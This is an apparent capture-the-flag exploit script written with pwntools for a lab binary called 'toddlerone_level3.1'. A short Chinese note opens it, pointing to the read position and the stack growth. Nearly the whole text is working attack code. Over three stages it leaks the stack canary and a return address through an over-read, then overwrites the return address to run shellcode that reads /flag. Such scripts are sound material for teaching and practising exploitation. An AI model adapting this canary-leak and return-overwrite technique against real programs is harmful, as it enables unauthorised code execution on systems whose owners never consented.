3.1
需要注意两个点,一个是read的位置,一个是每次启动challenge函数后栈的长度变化
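"""Interaction script for /challenge/toddlerone_level3.1.

Three payloads are sent, each preceded by its length on the
"Payload size: " prompt; the bytes read back after the first two
are unpacked into `canary` and `ret_addr` and reused in the third.
The session is then handed over to the user.
"""
from pwn import *

context.log_level = "info"

r = process(["/challenge/toddlerone_level3.1"])
payload = asm(shellcraft.amd64.linux.cat("/flag"), arch="amd64")


def send_payload(data: bytes) -> None:
    """Answer the size prompt with len(data), then send data verbatim.

    All prompts are matched as bytes so the three stages behave the same
    regardless of pwntools' str-to-bytes coercion rules.
    """
    r.sendlineafter(b"Payload size: ", b"%d" % len(data))
    r.sendafter(b"bytes)!\n", data)


# Stage 1: 'REPEAT' prefix, padding, and a single 'b' marker;
# the 7 bytes following the echoed marker are zero-extended into `canary`.
payload1 = b"REPEAT" + b"a" * (0x28 - 6 - 8 * 2) + b"b"
send_payload(payload1)
print(r.recvuntil(b"aaaaaaaab"))
canary = u64(r.recv(7).rjust(8, b"\x00"))
log.success(f"canary => {canary:#x}")

# Stage 2: longer padding ending in the same marker; the rest of the
# echoed line (newline stripped) is zero-padded into `ret_addr`.
payload2 = b"REPEAT" + b"a" * (0x28 - 6 - 8) + b"a" * 0x10 + b"aaaaaaab"
log.info(str(payload2))
send_payload(payload2)
r.recvuntil(b"aaaaaaaab")
ret_addr = u64(r.recvline()[:-1].ljust(8, b"\x00"))
log.success(f"ret addr => {ret_addr:#x}")

# Stage 3: padding, the recovered canary, 8 filler bytes, the adjusted
# return address (offsets are the author's constants for this binary),
# then the assembled shellcode.
payload3 = (
    b"aaaaaa"
    + b"a" * (0x28 - 6 - 8 * 2)
    + p64(canary)
    + b"aaaaaaaa"
    + p64(ret_addr - 0x1140 - 0x70 * 2 + 8)
    + payload
)
log.info(str(payload3))
send_payload(payload3)

r.interactive()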